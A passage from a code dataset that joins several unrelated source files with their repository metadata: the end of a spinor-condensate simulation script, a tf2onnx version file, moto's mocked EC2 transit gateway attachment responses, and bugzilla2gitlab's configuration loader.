print(color_text('Running Fock State Simulation', 'CYAN'))
ts = time_mod.time()
npairs = int(self.params['n1'])
N = self.params['n0'] + self.params['n1'] + self.params['nm1']
time, n0, n0var, init_norm = fock_sim(self.params['total_time'],
self.params['time_step'],
self.params['mag_time'],
self.params['tauB'],
N,
self.params['c'] * 2 * np.pi,
self.params['magnetic_field'],
npairs)
std = np.sqrt(n0var)
if not self.number:
n0 = n0 / N
std = std / N
self.fock_res = SimulationResult(
time, n0, std, 'red', os.path.join(self.savepath,'Fock'), init_norm=init_norm)
self.fock = True
if self.verbose:
te = time_mod.time()
print(color_text('Finished Fock State Simulation', 'RED'))
print('Execution Time: {0:>4.2f}'.format(te - ts))
def run_mean(self):
"""run a mean field simulation with the current parameters"""
if self.verbose:
print(color_text('Running Mean Field Simulation', 'YELLOW'))
ts = time_mod.time()
time, mean, std, mw = mean_sim(int(self.params['n1']),
int(self.params['n0']),
int(self.params['nm1']),
self.params['spinor_phase'],
int(self.params['n_samps']),
self.params['c'] * 2 * np.pi,
self.params['total_time'] + .05 *
self.params['total_time'],
self.params['magnetic_field'],
self.pulses,
qu0=0)
if self.number:
N = self.params['n0'] + self.params['n1'] + self.params['nm1']
mean = mean * N
std = std * N
self.mean_res = SimulationResult(time, mean, std, 'blue', os.path.join(self.savepath,'Mean'))
self.mean = True
if self.verbose:
te = time_mod.time()
print(color_text('Finished Mean Field Simulation', 'RED'))
print('Execution Time: {0:>4.2f}'.format(te - ts))
def run_cheby(self, save=False):
"""run a chebyshev simulation with the current paramters"""
if self.verbose:
print(color_text('Running Coherent Simulation', 'MAGENTA'))
ts = time_mod.time()
if self.pulses == []:
dt = .001
c = [self.params['c']]
emw = [0]
mag_field = self.params['magnetic_field'] * \
100 / np.sqrt(2 * np.pi)
n_step = [int(self.params['total_time'] / dt)]
ndiv = 1
delta_t = [self.params['total_time']]
else:
dt = [.001, .0001, .001]
c = self.params['c']
ndiv = len(c)
emw = self.params['q']
mag_field = 0
n_step = [int(self.params['total_time'][i] / dt[i])
for i in range(len(dt))]
delta_t = [i for i in self.params['total_time']]
N = self.params['n0'] + self.params['n1'] + self.params['nm1']
sum_of_means, sum_of_meansq, norm, time = cheby_sim(mag_field,
int(N),
int(self.params['mag']),
int(self.params['mag_range']),
int(self.params['atom_range']),
self.params['spinor_phase'],
int(self.params['n0']),
ndiv,
delta_t,
c,
emw,
n_step)
mean = sum_of_means / norm
meansq = sum_of_meansq / norm
std = np.sqrt(meansq - mean * mean)
self.cheby = True
name_ = os.path.join(self.savepath, 'Coherent')
if self.number:
self.cheby_res = SimulationResult(
time, mean, std, 'green', name_)
else:
self.cheby_res = SimulationResult(
time, mean / N, std / N, 'green', name_)
if self.verbose:
te = time_mod.time()
print('\n', color_text('Finished Coherent Simulation', 'RED'))
print('Execution Time: {0:>4.2f}'.format(te - ts))
def plot(self, col=False, region=False):
if not self._has_result:
print('Cannot plot with no simulation')
if col != False:
ax = plt.gca()
if self.fock:
self.fock_res.plot_no_color(ax, col=col)
if self.mean:
self.mean_res.plot_no_color(ax, col=col)
if self.cheby:
self.cheby_res.plot_no_color(ax, col=col)
ax.set_xlabel('t (s)')
if self.number:
ax.set_ylabel(r'$N_{m_F=0}$')
else:
ax.set_ylabel(r'$\rho_0$')
ax.legend()
elif region == True:
fig, ax = plt.subplots()
if self.fock:
self.fock_res.plot(ax)
if self.mean:
self.mean_res.plot(ax)
if self.cheby:
self.cheby_res.plot(ax)
ax.set_xlabel('t (s)')
if self.number:
ax.set_ylabel(r'$N_{m_F=0}$')
else:
ax.set_ylabel(r'$\rho_0$')
ax.legend()
else:
fig, ax = plt.subplots()
if self.fock:
self.fock_res.plot_ryan(ax)
if self.mean:
self.mean_res.plot_ryan(ax)
if self.cheby:
self.cheby_res.plot_ryan(ax)
ax.set_xlabel('t (s)')
if self.number:
ax.set_ylabel(r'$N_{m_F=0}$')
else:
ax.set_ylabel(r'$\rho_0$')
ax.legend()
def _has_result(self):
if self.fock or self.mean or self.cheby:
return True
else:
return False
def _reset(self):
self.cheby = False
self.mean = False
self.fock = False
def single_simulation(config, args):
# keys for configuarion file
sims = 'Simulation Settings'
gsp = 'Global Simulation Parameters'
tw = 'TW Parameters'
fsp = 'Fock Simulation Parameters'
cscp = 'Coherent State Chebyshev Parameters'
# create simulation objects
name = config[sims].get('Name', 'sim')
savepath = config[sims].get("Savepath",'')
s = Simulation(name, savepath)
if args.verbose == True:
s.verbose = True
# loop through each one
print('Parameter Settings:')
for con in [config[gsp], config[tw], config[fsp], config[cscp]]:
for key in con:
s.params[key] = float(con[key])
if args.verbose == True:
print(' {0:<15} set to {1}'.format(key, con[key]))
# now check for q or magnetic field
if s.params['q']:
s.q = True
# now mock mock the magnetic field such that we get q
s.transform_q()
print(s.params['magnetic_field'])
# now run simulations
if args.verbose == True:
print(''.join('#' for i in range(20)))
print('Simulations Set Up - Starting Numerics')
ts = time_mod.time()
s.number = True
if config[sims].getboolean('run_coherent', False):
s.run_cheby()
if config[sims].getboolean('save', False):
s.cheby_res.save(name)
if config[sims].getboolean('run_fock', False):
s.run_fock()
if config[sims].getboolean('save', False):
s.fock_res.save(name)
if config[sims].getboolean('run_tw', False):
s.run_mean()
if config[sims].getboolean('save', False):
s.mean_res.save(name)
te = time_mod.time()
if args.verbose == True:
mins, secs = divmod(te - ts, 60)
hours, mins = divmod(mins, 60)
print(''.join('#' for i in range(20)))
out_form = 'Total Sim Time {0:02.0f}h:{1:02.0f}m:{2:02.2f}s'
print(out_form.format(hours, mins, secs))
if config[sims].getboolean('plot', True):
s.plot()
print('Saving Figure', '{0}_plot.pdf'.format(s.name))
plt.savefig('{0}_plot.pdf'.format(os.path.join(savepath, s.name)))
plt.show()
if args.verbose == True:
print(''.join('#' for i in range(20)))
print('Simulation Complete')
def main(config, args):
single_simulation(config, args)
# Should write function where input not from connfig file
if __name__ == '__main__':
# add parser
parser = argparse.ArgumentParser()
parser.add_argument('-v',
dest='verbose',
action='store',
default=True,
help='verbose output (default True)')
parser.add_argument('-c',
dest='config',
action='store',
help='Path to config file',
required=True)
args = parser.parse_args()
# get configuration
config = configparser.ConfigParser()
config.read(args.config)
main(config, args)
| 35.655012
| 101
| 0.514514
|
d5da3ce71f85c40361761a61cce153c79bd0055d
| 75
|
py
|
Python
|
tf2onnx/version.py
|
natke/tensorflow-onnx
|
af083a2e070d67b7ca47e9babe7ff6938b169176
|
[
"MIT"
] | null | null | null |
tf2onnx/version.py
|
natke/tensorflow-onnx
|
af083a2e070d67b7ca47e9babe7ff6938b169176
|
[
"MIT"
] | null | null | null |
tf2onnx/version.py
|
natke/tensorflow-onnx
|
af083a2e070d67b7ca47e9babe7ff6938b169176
|
[
"MIT"
] | null | null | null |
version = '1.6.0'
git_version = '82f805f8fe7d2fa91e6ca9d39e153712f6887fec'
| 25
| 56
| 0.813333
|
0b877c8c98cb7469d721036f57817191b8a06102
| 23,187
|
py
|
Python
|
moto/ec2/responses/transit_gateway_attachments.py
|
mts-engineering/moto
|
ee6f20e376a902ab38810ab41094fda96cbee65c
|
[
"Apache-2.0"
] | null | null | null |
moto/ec2/responses/transit_gateway_attachments.py
|
mts-engineering/moto
|
ee6f20e376a902ab38810ab41094fda96cbee65c
|
[
"Apache-2.0"
] | null | null | null |
moto/ec2/responses/transit_gateway_attachments.py
|
mts-engineering/moto
|
ee6f20e376a902ab38810ab41094fda96cbee65c
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
from moto.core.responses import BaseResponse
from moto.ec2.utils import filters_from_querystring, add_tag_specification
class TransitGatewayAttachment(BaseResponse):
def create_transit_gateway_vpc_attachment(self):
options = self._get_multi_param_dict("Options")
subnet_ids = self._get_multi_param("SubnetIds")
transit_gateway_id = self._get_param("TransitGatewayId")
vpc_id = self._get_param("VpcId")
tags = self._get_multi_param("TagSpecifications")
tags = tags[0] if isinstance(tags, list) and len(tags) == 1 else tags
tags = (tags or {}).get("Tag", [])
tags = {t["Key"]: t["Value"] for t in tags}
transit_gateway_attachment = self.ec2_backend.create_transit_gateway_vpc_attachment(
transit_gateway_id=transit_gateway_id,
tags=tags,
vpc_id=vpc_id,
subnet_ids=subnet_ids,
options=options,
)
template = self.response_template(CREATE_TRANSIT_GATEWAY_VPC_ATTACHMENT)
return template.render(transit_gateway_attachment=transit_gateway_attachment)
def describe_transit_gateway_vpc_attachments(self):
transit_gateways_attachment_ids = self._get_multi_param(
"TransitGatewayAttachmentIds"
)
filters = filters_from_querystring(self.querystring)
max_results = self._get_param("MaxResults")
transit_gateway_vpc_attachments = self.ec2_backend.describe_transit_gateway_vpc_attachments(
transit_gateways_attachment_ids=transit_gateways_attachment_ids,
filters=filters,
max_results=max_results,
)
template = self.response_template(DESCRIBE_TRANSIT_GATEWAY_VPC_ATTACHMENTS)
return template.render(
transit_gateway_vpc_attachments=transit_gateway_vpc_attachments
)
def modify_transit_gateway_vpc_attachment(self):
add_subnet_ids = self._get_multi_param("AddSubnetIds")
options = self._get_multi_param_dict("Options")
remove_subnet_ids = self._get_multi_param("RemoveSubnetIds")
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_attachment = self.ec2_backend.modify_transit_gateway_vpc_attachment(
add_subnet_ids=add_subnet_ids,
options=options,
remove_subnet_ids=remove_subnet_ids,
transit_gateway_attachment_id=transit_gateway_attachment_id,
)
template = self.response_template(MODIFY_TRANSIT_GATEWAY_VPC_ATTACHMENTS)
return template.render(transit_gateway_attachment=transit_gateway_attachment)
def describe_transit_gateway_attachments(self):
transit_gateways_attachment_ids = self._get_multi_param(
"TransitGatewayAttachmentIds"
)
filters = filters_from_querystring(self.querystring)
max_results = self._get_param("MaxResults")
transit_gateway_attachments = self.ec2_backend.describe_transit_gateway_attachments(
transit_gateways_attachment_ids=transit_gateways_attachment_ids,
filters=filters,
max_results=max_results,
)
template = self.response_template(DESCRIBE_TRANSIT_GATEWAY_ATTACHMENTS)
return template.render(transit_gateway_attachments=transit_gateway_attachments)
def delete_transit_gateway_vpc_attachment(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_attachment = self.ec2_backend.delete_transit_gateway_vpc_attachment(
transit_gateway_attachment_id=transit_gateway_attachment_id
)
template = self.response_template(DELETE_TRANSIT_GATEWAY_VPC_ATTACHMENTS)
return template.render(transit_gateway_attachment=transit_gateway_attachment)
def associate_transit_gateway_route_table(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_route_table_id = self._get_param("TransitGatewayRouteTableId")
transit_gateway_association = self.ec2_backend.associate_transit_gateway_route_table(
transit_gateway_attachment_id=transit_gateway_attachment_id,
transit_gateway_route_table_id=transit_gateway_route_table_id,
)
template = self.response_template(TRANSIT_GATEWAY_ASSOCIATION)
return template.render(transit_gateway_association=transit_gateway_association)
def enable_transit_gateway_route_table_propagation(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_route_table_id = self._get_param("TransitGatewayRouteTableId")
transit_gateway_propagation = self.ec2_backend.enable_transit_gateway_route_table_propagation(
transit_gateway_attachment_id=transit_gateway_attachment_id,
transit_gateway_route_table_id=transit_gateway_route_table_id,
)
template = self.response_template(TRANSIT_GATEWAY_PROPAGATION)
return template.render(transit_gateway_propagation=transit_gateway_propagation)
def disable_transit_gateway_route_table_propagation(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_route_table_id = self._get_param("TransitGatewayRouteTableId")
transit_gateway_propagation = self.ec2_backend.disable_transit_gateway_route_table_propagation(
transit_gateway_attachment_id=transit_gateway_attachment_id,
transit_gateway_route_table_id=transit_gateway_route_table_id,
)
template = self.response_template(TRANSIT_GATEWAY_PROPAGATION)
return template.render(transit_gateway_propagation=transit_gateway_propagation)
def create_transit_gateway_peering_attachment(self):
peer_account_id = self._get_param("PeerAccountId")
peer_region = self._get_param("PeerRegion")
peer_transit_gateway_id = self._get_param("PeerTransitGatewayId")
transit_gateway_id = self._get_param("TransitGatewayId")
tags = add_tag_specification(self._get_multi_param("TagSpecification"))
transit_gateway_peering_attachment = self.ec2_backend.create_transit_gateway_peering_attachment(
transit_gateway_id,
peer_transit_gateway_id,
peer_region,
peer_account_id,
tags,
)
template = self.response_template(TRANSIT_GATEWAY_PEERING_ATTACHMENT)
return template.render(
method_name="CreateTransitGatewayPeeringAttachment",
transit_gateway_peering_attachment=transit_gateway_peering_attachment,
)
def describe_transit_gateway_peering_attachments(self):
transit_gateways_attachment_ids = self._get_multi_param(
"TransitGatewayAttachmentIds"
)
filters = filters_from_querystring(self.querystring)
max_results = self._get_param("MaxResults")
transit_gateway_peering_attachments = self.ec2_backend.describe_transit_gateway_peering_attachments(
transit_gateways_attachment_ids=transit_gateways_attachment_ids,
filters=filters,
max_results=max_results,
)
template = self.response_template(DESCRIBE_TRANSIT_GATEWAY_PEERING_ATTACHMENTS)
return template.render(
transit_gateway_peering_attachments=transit_gateway_peering_attachments
)
def accept_transit_gateway_peering_attachment(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_peering_attachment = self.ec2_backend.accept_transit_gateway_peering_attachment(
transit_gateway_attachment_id=transit_gateway_attachment_id
)
template = self.response_template(TRANSIT_GATEWAY_PEERING_ATTACHMENT)
return template.render(
method_name="AcceptTransitGatewayPeeringAttachment",
transit_gateway_peering_attachment=transit_gateway_peering_attachment,
)
def delete_transit_gateway_peering_attachment(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_peering_attachment = self.ec2_backend.delete_transit_gateway_peering_attachment(
transit_gateway_attachment_id=transit_gateway_attachment_id
)
template = self.response_template(TRANSIT_GATEWAY_PEERING_ATTACHMENT)
return template.render(
method_name="DeleteTransitGatewayPeeringAttachment",
transit_gateway_peering_attachment=transit_gateway_peering_attachment,
)
def reject_transit_gateway_peering_attachment(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_peering_attachment = self.ec2_backend.reject_transit_gateway_peering_attachment(
transit_gateway_attachment_id=transit_gateway_attachment_id
)
template = self.response_template(TRANSIT_GATEWAY_PEERING_ATTACHMENT)
return template.render(
method_name="RejectTransitGatewayPeeringAttachment",
transit_gateway_peering_attachment=transit_gateway_peering_attachment,
)
CREATE_TRANSIT_GATEWAY_VPC_ATTACHMENT = """<CreateTransitGatewayVpcAttachmentResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>9b5766ac-2af6-4b92-9a8a-4d74ae46ae79</requestId>
<transitGatewayVpcAttachment>
<createTime>{{ transit_gateway_attachment.create_time }}</createTime>
<options>
<applianceModeSupport>{{ transit_gateway_attachment.options.ApplianceModeSupport }}</applianceModeSupport>
<dnsSupport>{{ transit_gateway_attachment.options.DnsSupport }}</dnsSupport>
<ipv6Support>{{ transit_gateway_attachment.options.Ipv6Support }}</ipv6Support>
</options>
<state>{{ transit_gateway_attachment.state }}</state>
<subnetIds>
{% for subnet_id in transit_gateway_attachment.subnet_ids %}
<item>{{ subnet_id }}</item>
{% endfor %}
</subnetIds>
<tagSet>
{% for tag in transit_gateway_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_attachment.transit_gateway_id }}</transitGatewayId>
<vpcId>{{ transit_gateway_attachment.vpc_id }}</vpcId>
<vpcOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</vpcOwnerId>
</transitGatewayVpcAttachment>
</CreateTransitGatewayVpcAttachmentResponse>"""
DESCRIBE_TRANSIT_GATEWAY_ATTACHMENTS = """<DescribeTransitGatewayAttachmentsResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>92aa7885-74c0-42d1-a846-e59bd07488a7</requestId>
<transitGatewayAttachments>
{% for transit_gateway_attachment in transit_gateway_attachments %}
<item>
<association>
<state>associated</state>
<transitGatewayRouteTableId>tgw-rtb-0b36edb9b88f0d5e3</transitGatewayRouteTableId>
</association>
<creationTime>2021-07-18T08:57:21.000Z</creationTime>
<resourceId>{{ transit_gateway_attachment.resource_id }}</resourceId>
<resourceOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</resourceOwnerId>
<resourceType>{{ transit_gateway_attachment.resource_type }}</resourceType>
<state>{{ transit_gateway_attachment.state }}</state>
<tagSet>
{% for tag in transit_gateway_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_attachment.transit_gateway_id }}</transitGatewayId>
<transitGatewayOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</transitGatewayOwnerId>
</item>
{% endfor %}
</transitGatewayAttachments>
</DescribeTransitGatewayAttachmentsResponse>
"""
DESCRIBE_TRANSIT_GATEWAY_VPC_ATTACHMENTS = """<DescribeTransitGatewayVpcAttachmentsResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>bebc9670-0205-4f28-ad89-049c97e46633</requestId>
<transitGatewayVpcAttachments>
{% for transit_gateway_vpc_attachment in transit_gateway_vpc_attachments %}
<item>
<creationTime>2021-07-18T08:57:21.000Z</creationTime>
<options>
<applianceModeSupport>{{ transit_gateway_vpc_attachment.options.ApplianceModeSupport }}</applianceModeSupport>
<dnsSupport>{{ transit_gateway_vpc_attachment.options.DnsSupport }}</dnsSupport>
<ipv6Support>{{ transit_gateway_vpc_attachment.options.Ipv6Support }}</ipv6Support>
</options>
<state>{{ transit_gateway_vpc_attachment.state }}</state>
<subnetIds>
{% for id in transit_gateway_vpc_attachment.subnet_ids %}
<item>{{ id }}</item>
{% endfor %}
</subnetIds>
<tagSet>
{% for tag in transit_gateway_vpc_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_vpc_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_vpc_attachment.transit_gateway_id }}</transitGatewayId>
<vpcId>{{ transit_gateway_vpc_attachment.vpc_id }}</vpcId>
<vpcOwnerId>{{ transit_gateway_vpc_attachment.resource_owner_id }}</vpcOwnerId>
</item>
{% endfor %}
</transitGatewayVpcAttachments>
</DescribeTransitGatewayVpcAttachmentsResponse>
"""
MODIFY_TRANSIT_GATEWAY_VPC_ATTACHMENTS = """<ModifyTransitGatewayVpcAttachmentResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>9b5766ac-2af6-4b92-9a8a-4d74ae46ae79</requestId>
<transitGatewayVpcAttachment>
<createTime>{{ transit_gateway_attachment.create_time }}</createTime>
<options>
<applianceModeSupport>{{ transit_gateway_attachment.options.ApplianceModeSupport }}</applianceModeSupport>
<dnsSupport>{{ transit_gateway_attachment.options.DnsSupport }}</dnsSupport>
<ipv6Support>{{ transit_gateway_attachment.options.Ipv6Support }}</ipv6Support>
</options>
<state>{{ transit_gateway_attachment.state }}</state>
<subnetIds>
{% for subnet_id in transit_gateway_attachment.subnet_ids %}
<item>{{ subnet_id }}</item>
{% endfor %}
</subnetIds>
<tagSet>
{% for tag in transit_gateway_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_attachment.transit_gateway_id }}</transitGatewayId>
<vpcId>{{ transit_gateway_attachment.vpc_id }}</vpcId>
<vpcOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</vpcOwnerId>
</transitGatewayVpcAttachment>
</ModifyTransitGatewayVpcAttachmentResponse>"""
DELETE_TRANSIT_GATEWAY_VPC_ATTACHMENTS = """<DeleteTransitGatewayVpcAttachmentResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>9b5766ac-2af6-4b92-9a8a-4d74ae46ae79</requestId>
<transitGatewayVpcAttachment>
<createTime>{{ transit_gateway_attachment.create_time }}</createTime>
<options>
<applianceModeSupport>{{ transit_gateway_attachment.options.ApplianceModeSupport }}</applianceModeSupport>
<dnsSupport>{{ transit_gateway_attachment.options.DnsSupport }}</dnsSupport>
<ipv6Support>{{ transit_gateway_attachment.options.Ipv6Support }}</ipv6Support>
</options>
<state>{{ transit_gateway_attachment.state }}</state>
<subnetIds>
{% for subnet_id in transit_gateway_attachment.subnet_ids %}
<item>{{ subnet_id }}</item>
{% endfor %}
</subnetIds>
<tagSet>
{% for tag in transit_gateway_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_attachment.transit_gateway_id }}</transitGatewayId>
<vpcId>{{ transit_gateway_attachment.vpc_id }}</vpcId>
<vpcOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</vpcOwnerId>
</transitGatewayVpcAttachment>
</DeleteTransitGatewayVpcAttachmentResponse>"""
TRANSIT_GATEWAY_ASSOCIATION = """<AssociateTransitGatewayRouteTableResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>86a597cf-93ec-44a3-9559-4641863642a5</requestId>
<association>
<resourceId>{{ transit_gateway_association.resource_id }}</resourceId>
<resourceType>{{ transit_gateway_association.resource_type }}</resourceType>
<state>{{ transit_gateway_association.state }}</state>
<transitGatewayAttachmentId>{{ transit_gateway_association.transit_gateway_attachment_id }}</transitGatewayAttachmentId>
<transitGatewayRouteTableId>{{ transit_gateway_association.transit_gateway_route_table_id }}</transitGatewayRouteTableId>
</association>
</AssociateTransitGatewayRouteTableResponse>
"""
TRANSIT_GATEWAY_PROPAGATION = """<EnableTransitGatewayRouteTablePropagationResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>c78427d4-e498-46ae-bc14-32841b16bff4</requestId>
<propagation>
<resourceId>{{ transit_gateway_propagation.resource_id }}</resourceId>
<resourceType>{{ transit_gateway_propagation.resource_type }}</resourceType>
<state>{{ transit_gateway_propagation.state }}</state>
<transitGatewayAttachmentId>{{ transit_gateway_propagation.transit_gateway_attachment_id }}</transitGatewayAttachmentId>
<transitGatewayRouteTableId>{{ transit_gateway_propagation.transit_gateway_route_table_id }}</transitGatewayRouteTableId>
</propagation>
</EnableTransitGatewayRouteTablePropagationResponse>
"""
TRANSIT_GATEWAY_PEERING_ATTACHMENT = """<{{ method_name }} xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>9b5766ac-2af6-4b92-9a8a-4d74ae46ae79</requestId>
<transitGatewayPeeringAttachment>
<createTime>{{ transit_gateway_peering_attachment.create_time }}</createTime>
<state>{{ transit_gateway_peering_attachment.state }}</state>
<accepterTgwInfo>
<ownerId>{{ transit_gateway_peering_attachment.accepter_tgw_info.ownerId or '' }}</ownerId>
<region>{{ transit_gateway_peering_attachment.accepter_tgw_info.region or '' }}</region>
<transitGatewayId>{{ transit_gateway_peering_attachment.accepter_tgw_info.transitGatewayId or '' }}</transitGatewayId>
</accepterTgwInfo>
<requesterTgwInfo>
<ownerId>{{ transit_gateway_peering_attachment.requester_tgw_info.ownerId or '' }}</ownerId>
<region>{{ transit_gateway_peering_attachment.requester_tgw_info.region or '' }}</region>
<transitGatewayId>{{ transit_gateway_peering_attachment.requester_tgw_info.transitGatewayId or '' }}</transitGatewayId>
</requesterTgwInfo>
<status>{{ transit_gateway_peering_attachment.status.code }}</status>
<tagSet>
{% for tag in transit_gateway_peering_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_peering_attachment.id }}</transitGatewayAttachmentId>
</transitGatewayPeeringAttachment>
</{{ method_name }}>"""
DESCRIBE_TRANSIT_GATEWAY_PEERING_ATTACHMENTS = """<DescribeTransitGatewayPeeringAttachments xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>bebc9670-0205-4f28-ad89-049c97e46633</requestId>
<transitGatewayPeeringAttachments>
{% for transit_gateway_peering_attachment in transit_gateway_peering_attachments %}
<item>
<createTime>{{ transit_gateway_peering_attachment.create_time }}</createTime>
<state>{{ transit_gateway_peering_attachment.state }}</state>
<accepterTgwInfo>
<ownerId>{{ transit_gateway_peering_attachment.accepter_tgw_info.ownerId or '' }}</ownerId>
<region>{{ transit_gateway_peering_attachment.accepter_tgw_info.region or '' }}</region>
<transitGatewayId>{{ transit_gateway_peering_attachment.accepter_tgw_info.transitGatewayId or '' }}</transitGatewayId>
</accepterTgwInfo>
<requesterTgwInfo>
<ownerId>{{ transit_gateway_peering_attachment.requester_tgw_info.ownerId or '' }}</ownerId>
<region>{{ transit_gateway_peering_attachment.requester_tgw_info.region or '' }}</region>
<transitGatewayId>{{ transit_gateway_peering_attachment.requester_tgw_info.transitGatewayId or '' }}</transitGatewayId>
</requesterTgwInfo>
<status>{{ transit_gateway_peering_attachment.status.code }}</status>
<tagSet>
{% for tag in transit_gateway_peering_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_peering_attachment.id }}</transitGatewayAttachmentId>
</item>
{% endfor %}
</transitGatewayPeeringAttachments>
</DescribeTransitGatewayPeeringAttachments>
"""
| 54.175234
| 141
| 0.689309
|
7fabe5d1eb2cafdd7672953c419bfa18cfc500ce
| 3,705
|
py
|
Python
|
bugzilla2gitlab/config.py
|
abbbi/bugzilla2gitlab
|
254c0ea756fbe479d90df654055ef5dc4085c34a
|
[
"MIT"
] | null | null | null |
bugzilla2gitlab/config.py
|
abbbi/bugzilla2gitlab
|
254c0ea756fbe479d90df654055ef5dc4085c34a
|
[
"MIT"
] | null | null | null |
bugzilla2gitlab/config.py
|
abbbi/bugzilla2gitlab
|
254c0ea756fbe479d90df654055ef5dc4085c34a
|
[
"MIT"
] | null | null | null |
from collections import namedtuple
import os
import yaml
from .utils import _perform_request
Config = namedtuple(
"Config",
[
"gitlab_base_url",
"gitlab_project_id",
"bugzilla_base_url",
"bugzilla_user",
"bugzilla_auto_reporter",
"bugzilla_closed_states",
"default_headers",
"component_mappings",
"bugzilla_users",
"gitlab_users",
"gitlab_misc_user",
"default_gitlab_labels",
"datetime_format_string",
"map_operating_system",
"map_keywords",
"keywords_to_skip",
"map_milestones",
"milestones_to_skip",
"gitlab_milestones",
"dry_run",
"include_bugzilla_link",
"use_bugzilla_id",
"verify",
],
)
def get_config(path):
configuration = {}
configuration.update(_load_defaults(path))
configuration.update(
_load_user_id_cache(
path,
configuration["gitlab_base_url"],
configuration["default_headers"],
configuration["verify"],
)
)
if configuration["map_milestones"]:
configuration.update(
_load_milestone_id_cache(
configuration["gitlab_project_id"],
configuration["gitlab_base_url"],
configuration["default_headers"],
configuration["verify"],
)
)
configuration.update(_load_component_mappings(path))
return Config(**configuration)
def _load_defaults(path):
with open(os.path.join(path, "defaults.yml")) as f:
config = yaml.safe_load(f)
defaults = {}
for key in config:
if key == "gitlab_private_token":
defaults["default_headers"] = {"private-token": config[key]}
else:
defaults[key] = config[key]
return defaults
def _load_user_id_cache(path, gitlab_url, gitlab_headers, verify):
"""
Load cache of GitLab usernames and ids
"""
print("Loading user cache...")
with open(os.path.join(path, "user_mappings.yml")) as f:
bugzilla_mapping = yaml.safe_load(f)
gitlab_users = {}
for user in bugzilla_mapping:
gitlab_username = bugzilla_mapping[user]
uid = _get_user_id(gitlab_username, gitlab_url, gitlab_headers, verify=verify)
gitlab_users[gitlab_username] = str(uid)
mappings = {}
# bugzilla_username: gitlab_username
mappings["bugzilla_users"] = bugzilla_mapping
# gitlab_username: gitlab_userid
mappings["gitlab_users"] = gitlab_users
return mappings
def _load_milestone_id_cache(project_id, gitlab_url, gitlab_headers, verify):
"""
Load cache of GitLab milestones and ids
"""
print("Loading milestone cache...")
gitlab_milestones = {}
url = "{}/projects/{}/milestones".format(gitlab_url, project_id)
result = _perform_request(url, "get", headers=gitlab_headers, verify=verify)
if result and isinstance(result, list):
for milestone in result:
gitlab_milestones[milestone["title"]] = milestone["id"]
return {"gitlab_milestones": gitlab_milestones}
def _get_user_id(username, gitlab_url, headers, verify):
url = "{}/users?username={}".format(gitlab_url, username)
result = _perform_request(url, "get", headers=headers, verify=verify)
if result and isinstance(result, list):
return result[0]["id"]
raise Exception("No gitlab account found for user {}".format(username))
def _load_component_mappings(path):
with open(os.path.join(path, "component_mappings.yml")) as f:
component_mappings = yaml.safe_load(f)
return {"component_mappings": component_mappings}
| 28.5
| 86
| 0.645074
|
666976a79191d0453f6afeedda40ddaeb79b83d7
| 148
|
py
|
Python
|
topCoder/srms/200s/srm218/div2/access_level.py
|
gauravsingh58/algo
|
397859a53429e7a585e5f6964ad24146c6261326
|
[
"WTFPL"
] | 1
|
2020-09-30T19:53:08.000Z
|
2020-09-30T19:53:08.000Z
|
topCoder/srms/200s/srm218/div2/access_level.py
|
gauravsingh58/algo
|
397859a53429e7a585e5f6964ad24146c6261326
|
[
"WTFPL"
] | null | null | null |
topCoder/srms/200s/srm218/div2/access_level.py
|
gauravsingh58/algo
|
397859a53429e7a585e5f6964ad24146c6261326
|
[
"WTFPL"
] | 1
|
2020-10-15T09:10:57.000Z
